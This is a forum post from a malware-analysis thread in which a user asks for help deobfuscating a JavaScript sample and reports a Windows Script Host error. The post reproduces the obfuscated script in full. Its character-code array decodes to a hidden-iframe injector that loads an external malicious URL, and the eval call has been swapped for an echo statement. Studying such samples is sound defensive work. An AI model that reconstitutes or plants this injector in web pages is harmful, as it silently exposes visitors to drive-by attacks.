Thread: Deobfuscate Javascript, script can't be compiled
View Single Post
  #6  
Old 12-31-2011, 04:05
bolzano_1989 bolzano_1989 is offline
Friend
  
Join Date: Dec 2011
Posts: 109
Rept. Given: 16
Rept. Rcvd 27 Times in 18 Posts
Thanks Given: 10
Thanks Rcvd at 194 Times in 66 Posts
bolzano_1989 Reputation: 27
Quote:
Originally Posted by STRELiTZIA View Post
Hello,
Attached, basic ways to deobfuscate js.
The js code injects a malicious hidden !frame which leads to malicious url.

Flash movie link:
PHP Code:
http://www.multiupload.com/AB5F46WGOR 
Regards.
I could follow your helpful tutorial.
Thank you very much for your dynamic analysis tutorial although this way gives us many vulnerabilities .
Could you give me a static analysis way to deobfuscate the Javascript code ?

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Quote:
Originally Posted by qkumba View Post
Just change the final e(s); to "WScript.echo(s)" and you'll see the code.
You can even run the script using cscript.exe and redirect the output to a file.
I follow your instruction, but:
If I put the following code into a .wsf (Windows Script File) and run it:
Code:
Object.prototype.qwe=function()
 {
   return String["fro"+'mCha'+'rCo'+'de'];
 };
 Object.prototype.asd="e";
 var s="";
 try
 {
   {
   }
   ['qwtqwt']();
 }
 catch(q)
 {
   r=1;
 }
 if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof
 {
 }
 .asd.vfr==='undefined')w=2;
 e=eval;
 m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
 mm=
 {
 }
 .qwe();
 for(i=0;i<m.length;i++)if(
 {
 }
 .asd==='e')s+=mm(e("m"+"["+"i]")); 
 WScript.echo(s);
I will get the result:
Code:
Line: 29
Char: 12
Error: Invalid entity reference
Code: 8004000C
Source: Windows Script Host
If I put "WScript.echo(s);" to a html file with the obfuscated javascript code and open the html file with Firefox, I don't see the deobfuscated code.
Reply With Quote